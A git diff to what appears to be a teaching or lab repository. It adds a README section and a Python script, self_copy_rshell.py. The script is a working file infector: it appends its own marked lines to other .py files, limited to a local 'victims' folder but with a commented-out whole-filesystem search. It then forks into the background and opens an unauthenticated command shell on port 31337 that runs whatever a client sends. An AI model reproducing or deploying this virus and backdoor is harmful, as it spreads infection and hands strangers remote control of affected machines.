diff --git a/README.md b/README.md index d188f3e..532d3e1 100644 --- a/README.md +++ b/README.md @@ -11,10 +11,23 @@ $ python rshell.py ``` It will open a reverse shell on port 31337 on the local system. You can connect -to it using `nc 0.0.0.0 31337`. +to it using + +```bash +$ nc 0.0.0.0 31337 +``` ## self_copy_test.py Code snippet that searches files based on a search string and copies its content into all matched files. There is a local `victims` folder for testing purposes. + +## Putting things together + +```bash +$ python self_copy_rshell.py +``` + +Runs code that seraches for victim files and deploys a appends the reverse +shell snippet. The example only searches the local `victims` folder. diff --git a/self_copy_rshell.py b/self_copy_rshell.py new file mode 100644 index 0000000..bb29242 --- /dev/null +++ b/self_copy_rshell.py @@ -0,0 +1,66 @@ +import os #!x +import sys #!x +import glob #!x +import socket #!x +import string #!x + +# search command, adjust to your needs +#cmd = 'find / -name "*.py" -print' #!x +cmd = 'find ./victims -name "*.py" -print' #!x +# keyword which prevents file from getting infected +keyword = 'plsdontinjectme' #!x + +# for each file that matches the search command +for snippet in os.popen(cmd).readlines(): #!x + # strip newlines + snippet = snippet[:-1] #!x + try: #!x + # open this file containing the target code + code = open(__file__, 'r') #!x + # open victim file + victim = open(snippet, 'r') #!x + # read the content of the victim file + read_victim = victim.read() #!x + # if the file contains keyword, do not inject code + if str.find(read_victim, keyword) == -1: #!x + # open it with write_append rights + victim = open(snippet, 'a') #!x + # for each line in + for line in code.readlines(): #!x + # if the line contains the copy signal + if("#!x") in line: #!x + # close the code file + code.close() #!x + # cast the line containing code + insert=(line) #!x + # insert the code into the victim file + victim.write(insert) #!x + # poor mans error handling + except IOError: #!x + a = 1 #!x + +# fork to bg +pid = os.fork() #!x +# make sure we are in the child process +if pid > 0: #!x + sys.exit(0) +try: #!x + # create the socket and listen + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #!x + s.bind(("0.0.0.0",31337)) #!x + s.listen(1) #!x +# poor mans socket error handling +except socket.error as e: #!x + print(e) #!x + sys.exit(0) #!x +# forever try to accept new connections +while 1: #!x + (cli,add) = s.accept() #!x + info = {"platform":sys.platform, "version":sys.version} #!x + welcome = "You are connected to shell on {0[platform]}, Python Version: {0[version]}\r\n".format(info) #!x + cli.send(welcome.encode('utf-8')) #!x + # forever receive cli commends, execute and report back + while 1: #!x + data = cli.recv(1024).rstrip() #!x + resp = os.popen(data.decode('utf-8')).read() #!x + cli.send(resp.encode('utf-8')) #!x